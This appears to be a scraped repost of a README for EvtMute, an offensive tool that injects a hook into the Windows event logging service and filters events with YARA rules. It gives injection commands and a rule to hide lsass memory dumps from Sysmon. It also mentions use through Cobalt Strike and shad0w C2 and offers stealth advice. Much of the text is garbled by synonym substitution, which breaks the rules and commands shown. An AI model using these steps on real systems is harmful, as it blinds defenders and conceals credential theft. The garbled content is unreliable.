EvtMute – Apply A Filter To The Events Being Reported By Windows Event Logging
This is a instrument that allows you to offensively use YARA to apply a filter to the activities getting described by home windows celebration logging.
Usage
Grap the most recent verison from right here. EvtMuteHook.dll consists of the core performance, once it is injected it will utilize a momentary filter which will allow for all occasions to be described, this filter can be dynamically up-to-date with out possessing to reinject. I have written SharpEvtMute.exe which is a C# assembly that can quickly operate by means of execute in shad0w or execute-assembly in cobalt strike. I will be creating a native model in C for a great deal much better intergration with shad0w.
Disabling Logging
A trivial use situation would be to disable party logging procedure broad. To do this we can use the adhering to yara rule.
rule disable affliction: accurate
We will want to start out by injecting the hook into the celebration company.
.SharpEvtMute.exe --Inject
Now that the hook is positioned we can add the filter.
.SharpEvtMute.exe --Filter "rule disable condition: correct "
Now all activities will be dropped by the celebration assistance.
Intricate Filters
Filters can be dynamically improved with no getting to reinject a hook. This would make it swift and straightforward to update the energetic filter.
An instance of a more intricate filter would be this. It is capable of blocking the activities associated to a lsass memory dump from remaining reported by sysmon.
rule block_lsass_dump
meta:
writer = "@_batsec_"
description = "Stop lsass dumping being noted by sysmon"
strings:
$provider = "Microsoft-Windows-Sysmon"
$impression = "lsass.exe" nocase
$access = "GrantedAccess"
$style = "0x1fffff"
condition:
all of them
With a complicated rule like this it is a lot more challenging to condense it into a single line. This is why I additional the ability to give base64 encoded principles.
The rule can very easily be transformed to foundation64 from a linux command line.
foundation64 -w YaraFilters/lsassdump.yar | echo $(</dev/stdin)
Then using the --Encoded flag we can pass it as a filter
Opsec Considerations
When injecting the hook SharpEvtMute.exe will call CreateRemoteThread and this call is made before the hook is placed so it will be reported by Sysmon. This is because the injection feature of SharpEvtMute.exe should only be used as a PoC. I recommend manually injecting EvtMuteHook.dll into the event logging service when stealth is important.
It’s pid can be found by running SharpEvtMute.exe --Pid. The hook can be placed by manually injecting the shellcode (run make in EvtMuteBin) via your C2 framework of choice, e.g shinject in shad0w.
It is also worth mentioning that the hook will use a named pipe to update filters. The named pipe is called EvtMuteHook_Rule_Pipe (this named can be changed easily). There is a rule hard baked into the hook to ensure that any events including this name will be dropped automatically but it will still be an IOC having it listening, so I recommend changing it.
Community Filters
If you create some useful filters feel free to make a pull request to the YaraFilters directory. It would be cool to have a good collection of filters to hide common actions that everyone can benefit from.
